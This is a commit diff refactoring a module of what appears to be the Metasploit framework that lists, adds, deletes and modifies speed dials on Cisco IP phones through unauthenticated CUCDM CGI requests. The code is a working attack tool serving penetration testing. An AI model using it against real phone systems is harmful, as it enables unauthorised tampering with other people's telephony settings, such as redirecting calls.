Refactor run method

jvazquez-r7 · jvazquez-r7 · commit a2d479a89404 · 2015-01-10T01:06:56.000-06:00
diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb
@@ -48,88 +48,16 @@ def initialize(info={})
   end
 
   def run
-    mac = Rex::Text.uri_encode(datastore['MAC'])
-    name = Rex::Text.uri_encode(datastore['NAME'])
-    position = Rex::Text.uri_encode(datastore['POSITION'])
-    telno = Rex::Text.uri_encode(datastore['TELNO'])
 
     case action.name.upcase
       when 'MODIFY'
-        print_status("#{peer} - Deleting Speed Dial of the IP phone")
-
-        vars_get = {
-          'entry' => "#{position}",
-          'device' => "SEP#{mac}"
-        }
-
-        status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
-
-        if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
-          print_good("#{peer} - Speed Dial #{position} is deleted successfully")
-          print_status("#{peer} - Adding Speed Dial to the IP phone")
-
-          vars_get = {
-            'name' => "#{name}",
-            'telno' => "#{telno}",
-            'device' => "SEP#{mac}",
-            'entry' => "#{position}",
-            'mac' => "#{mac}"
-          }
-
-          status, res = send_rcv('phonespeedialadd.cgi', vars_get)
-
-          if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
-            print_good("#{peer} - Speed Dial #{position} is added successfully")
-          elsif res && res.body =~ /exist/
-            print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
-          else
-            print_error("#{peer} - Speed Dial couldn't add!")
-          end
-        else
-          print_error("#{peer} - Speed Dial is not found!")
-        end
+        modify
       when 'DELETE'
-        print_status("#{peer} - Deleting Speed Dial of the IP phone")
-
-        vars_get = {
-          'entry' => "#{position}",
-          'device' => "SEP#{mac}"
-        }
-
-        status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
-
-        if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
-          print_good("#{peer} - Speed Dial #{position} is deleted successfully")
-        else
-          print_error("#{peer} - Speed Dial is not found!")
-        end
-
+        delete
       when 'ADD'
-        print_status("#{peer} - Adding Speed Dial to the IP phone")
-        vars_get = {
-          'name' => "#{name}",
-          'telno' => "#{telno}",
-          'device' => "SEP#{mac}",
-          'entry' => "#{position}",
-          'mac' => "#{mac}"
-        }
-        status, res = send_rcv('phonespeedialadd.cgi', vars_get)
-
-        if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
-          print_good("#{peer} - Speed Dial #{position} is added successfully")
-        elsif res && res.body && res.body.to_s =~ /exist/
-          print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
-        else
-          print_error("#{peer} - Speed Dial couldn't add!")
-        end
-    else
-      print_status("Getting Speed Dials of the IP phone")
-      vars_get = {
-        'device' => "SEP#{mac}"
-      }
-
-      status, res = send_rcv('speeddials.cgi', vars_get)
-      parse(res) unless status == Exploit::CheckCode::Safe
+        add
+      when 'LIST'
+        list
     end
 
   end
@@ -177,4 +105,102 @@ def parse(res)
       print_status("#{peer} - No Speed Dial detected")
     end
   end
+
+  def list
+    mac = datastore['MAC']
+
+    print_status("#{peer} - Getting Speed Dials of the IP phone")
+    vars_get = {
+      'device' => "SEP#{mac}"
+    }
+
+    status, res = send_rcv('speeddials.cgi', vars_get)
+    parse(res) unless status == Exploit::CheckCode::Safe
+  end
+
+  def add
+    mac = datastore['MAC']
+    name = datastore['NAME']
+    position = datastore['POSITION']
+    telno = datastore['TELNO']
+
+    print_status("#{peer} - Adding Speed Dial to the IP phone")
+    vars_get = {
+      'name' => "#{name}",
+      'telno' => "#{telno}",
+      'device' => "SEP#{mac}",
+      'entry' => "#{position}",
+      'mac' => "#{mac}"
+    }
+    status, res = send_rcv('phonespeedialadd.cgi', vars_get)
+
+    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
+      print_good("#{peer} - Speed Dial #{position} is added successfully")
+    elsif res && res.body && res.body.to_s =~ /exist/
+      print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
+    else
+      print_error("#{peer} - Speed Dial couldn't add!")
+    end
+  end
+
+  def delete
+    mac = datastore['MAC']
+    position = datastore['POSITION']
+
+    print_status("#{peer} - Deleting Speed Dial of the IP phone")
+
+    vars_get = {
+      'entry' => "#{position}",
+      'device' => "SEP#{mac}"
+    }
+
+    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
+
+    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
+      print_good("#{peer} - Speed Dial #{position} is deleted successfully")
+    else
+      print_error("#{peer} - Speed Dial is not found!")
+    end
+  end
+
+  def modify
+    mac = datastore['MAC']
+    name = datastore['NAME']
+    position = datastore['POSITION']
+    telno = datastore['TELNO']
+
+    print_status("#{peer} - Deleting Speed Dial of the IP phone")
+
+    vars_get = {
+      'entry' => "#{position}",
+      'device' => "SEP#{mac}"
+    }
+
+    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
+
+    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
+      print_good("#{peer} - Speed Dial #{position} is deleted successfully")
+      print_status("#{peer} - Adding Speed Dial to the IP phone")
+
+      vars_get = {
+        'name' => "#{name}",
+        'telno' => "#{telno}",
+        'device' => "SEP#{mac}",
+        'entry' => "#{position}",
+        'mac' => "#{mac}"
+      }
+
+      status, res = send_rcv('phonespeedialadd.cgi', vars_get)
+
+      if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
+        print_good("#{peer} - Speed Dial #{position} is added successfully")
+      elsif res && res.body =~ /exist/
+        print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
+      else
+        print_error("#{peer} - Speed Dial couldn't add!")
+      end
+    else
+      print_error("#{peer} - Speed Dial is not found!")
+    end
+  end
 end
